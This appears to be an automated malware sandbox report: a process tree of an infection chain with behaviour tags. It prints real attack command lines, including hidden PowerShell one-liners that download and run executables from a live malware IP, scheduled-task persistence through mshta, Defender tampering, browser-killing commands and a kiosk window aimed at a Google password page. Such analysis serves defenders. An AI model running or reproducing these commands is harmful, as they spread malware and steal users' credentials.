PID:2032 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn rIrBgmalQ01 /tr "mshta C:\Users\Admin\AppData\Local\Temp\L1gHGJV4N.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1200
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\L1gHGJV4N.hta4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Users\Admin\AppData\Local\TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE"C:\Users\Admin\AppData\Local\TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1592
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\1085379021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1085379021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1240
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "uy1FfmaQGO0" /tr "mshta \"C:\Temp\nASUYzcRL.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1492
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\nASUYzcRL.hta"5⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2180
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085401001\b3513fa42a.exe"C:\Users\Admin\AppData\Local\Temp\1085401001\b3513fa42a.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2124
-
-
C:\Users\Admin\AppData\Local\Temp\1085402001\dc4be0dfa1.exe"C:\Users\Admin\AppData\Local\Temp\1085402001\dc4be0dfa1.exe"3⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:668 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1796 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6bd9758,0x7fef6bd9768,0x7fef6bd97785⤵PID:1016
-
-
C:\Windows\system32\ctfmon.exectfmon.exe5⤵PID:2984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1088 --field-trial-handle=1464,i,17994464920727311300,11202991624323757974,131072 /prefetch:25⤵PID:2920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1400 --field-trial-handle=1464,i,17994464920727311300,11202991624323757974,131072 /prefetch:85⤵PID:2696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1620 --field-trial-handle=1464,i,17994464920727311300,11202991624323757974,131072 /prefetch:85⤵PID:2736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2324 --field-trial-handle=1464,i,17994464920727311300,11202991624323757974,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:2288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2340 --field-trial-handle=1464,i,17994464920727311300,11202991624323757974,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:2996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3276 --field-trial-handle=1464,i,17994464920727311300,11202991624323757974,131072 /prefetch:25⤵PID:2832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2248 --field-trial-handle=1464,i,17994464920727311300,11202991624323757974,131072 /prefetch:25⤵PID:2192
-
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1312
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4072
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 668 -s 9804⤵
- Loads dropped DLL
- Program crash
PID:3888
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085403001\b34dd26e42.exe"C:\Users\Admin\AppData\Local\Temp\1085403001\b34dd26e42.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:3044
-
-
C:\Users\Admin\AppData\Local\Temp\1085404001\d71a31942b.exe"C:\Users\Admin\AppData\Local\Temp\1085404001\d71a31942b.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1240
-
-
C:\Users\Admin\AppData\Local\Temp\1085405001\66c328e804.exe"C:\Users\Admin\AppData\Local\Temp\1085405001\66c328e804.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2124 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:408
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085406001\8f62e4017e.exe"C:\Users\Admin\AppData\Local\Temp\1085406001\8f62e4017e.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:1752
-
-
C:\Users\Admin\AppData\Local\Temp\1085407001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1085407001\amnew.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:2260 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:880 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1360 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:904
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 5606⤵
- Loads dropped DLL
- Program crash
PID:1988
-
-
-
C:\Users\Admin\AppData\Local\Temp\10006970101\73a2489454.exe"C:\Users\Admin\AppData\Local\Temp\10006970101\73a2489454.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:316
-
-
C:\Users\Admin\AppData\Local\Temp\10006980101\1a76572772.exe"C:\Users\Admin\AppData\Local\Temp\10006980101\1a76572772.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1360 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:3308
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085408001\jROrnzx.exe"C:\Users\Admin\AppData\Local\Temp\1085408001\jROrnzx.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2204 -
C:\Users\Admin\AppData\Local\Temp\1085408001\jROrnzx.exe"C:\Users\Admin\AppData\Local\Temp\1085408001\jROrnzx.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1696
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 5604⤵
- Loads dropped DLL
- Program crash
PID:2132
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085409001\qFqSpAp.exe"C:\Users\Admin\AppData\Local\Temp\1085409001\qFqSpAp.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3020 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 8204⤵
- Loads dropped DLL
- Program crash
PID:2780
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085410001\9b9b61ca89.exe"C:\Users\Admin\AppData\Local\Temp\1085410001\9b9b61ca89.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2280 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:996
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085411001\67839429c6.exe"C:\Users\Admin\AppData\Local\Temp\1085411001\67839429c6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2752
-
-
C:\Users\Admin\AppData\Local\Temp\1085412001\0b87b998dd.exe"C:\Users\Admin\AppData\Local\Temp\1085412001\0b87b998dd.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2620
-
-
C:\Users\Admin\AppData\Local\Temp\1085413001\7e0a6a635d.exe"C:\Users\Admin\AppData\Local\Temp\1085413001\7e0a6a635d.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1920 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2096
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:2172
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2924 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2924.0.1978658245\1097805368" -parentBuildID 20221007134813 -prefsHandle 1168 -prefMapHandle 1160 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e09906b7-dbae-48a8-b1a7-a00c837ae7ff} 2924 "\\.\pipe\gecko-crash-server-pipe.2924" 1284 105d9458 gpu6⤵PID:1184
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2924.1.622497473\320117096" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9ba98af-f788-429b-808e-c9afa5f2380a} 2924 "\\.\pipe\gecko-crash-server-pipe.2924" 1500 43d2d58 socket6⤵PID:2780
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2924.2.814307107\302926731" -childID 1 -isForBrowser -prefsHandle 1652 -prefMapHandle 1852 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e873a1e-810c-419e-a33d-a7ac596d373a} 2924 "\\.\pipe\gecko-crash-server-pipe.2924" 1660 18a71858 tab6⤵PID:1548
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2924.3.1949358645\172501209" -childID 2 -isForBrowser -prefsHandle 2652 -prefMapHandle 2648 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f86250c4-3dbd-4148-bf63-61884b5f69b8} 2924 "\\.\pipe\gecko-crash-server-pipe.2924" 2664 1b83b258 tab6⤵PID:1736
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2924.4.1700899133\560536069" -childID 3 -isForBrowser -prefsHandle 3276 -prefMapHandle 3272 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {83daec9b-2987-4c35-8e7b-ec843dc88ad8} 2924 "\\.\pipe\gecko-crash-server-pipe.2924" 3340 1f39d358 tab6⤵PID:3740
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2924.5.784444587\1824147297" -childID 4 -isForBrowser -prefsHandle 3724 -prefMapHandle 3728 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bfe3bb93-884c-41b9-80d7-867036e0f498} 2924 "\\.\pipe\gecko-crash-server-pipe.2924" 3712 1db1bf58 tab6⤵PID:3824
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2924.6.1759552540\222722137" -childID 5 -isForBrowser -prefsHandle 3912 -prefMapHandle 3916 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {939becbc-374b-4569-8cc0-d4c3527194e8} 2924 "\\.\pipe\gecko-crash-server-pipe.2924" 3900 1f16fb58 tab6⤵PID:3920
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085414001\284e4384ff.exe"C:\Users\Admin\AppData\Local\Temp\1085414001\284e4384ff.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2344 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn NnshkmaDC0a /tr "mshta C:\Users\Admin\AppData\Local\Temp\TbifBFjtM.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:924 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn NnshkmaDC0a /tr "mshta C:\Users\Admin\AppData\Local\Temp\TbifBFjtM.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:836
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\TbifBFjtM.hta4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1740 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'AKP2DYV3BSK07NDW6T3KZEUUEAXHHF21.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1928 -
C:\Users\Admin\AppData\Local\TempAKP2DYV3BSK07NDW6T3KZEUUEAXHHF21.EXE"C:\Users\Admin\AppData\Local\TempAKP2DYV3BSK07NDW6T3KZEUUEAXHHF21.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3484
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085415001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1085415001\Bjkm5hE.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3392 -
C:\Users\Admin\AppData\Local\Temp\1085415001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1085415001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3532
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3392 -s 5604⤵
- Loads dropped DLL
- Program crash
PID:3588
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085416001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1085416001\d2YQIJa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3936
-
-
C:\Users\Admin\AppData\Local\Temp\1085417001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1085417001\DTQCxXZ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3236
-
-
C:\Users\Admin\AppData\Local\Temp\1085418001\294e1c6dae.exe"C:\Users\Admin\AppData\Local\Temp\1085418001\294e1c6dae.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3288 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:3936
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085419001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1085419001\Ta3ZyUR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3124 -
C:\Users\Admin\AppData\Local\Temp\1085419001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1085419001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3216
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 5564⤵
- Program crash
PID:3208
-
-
-
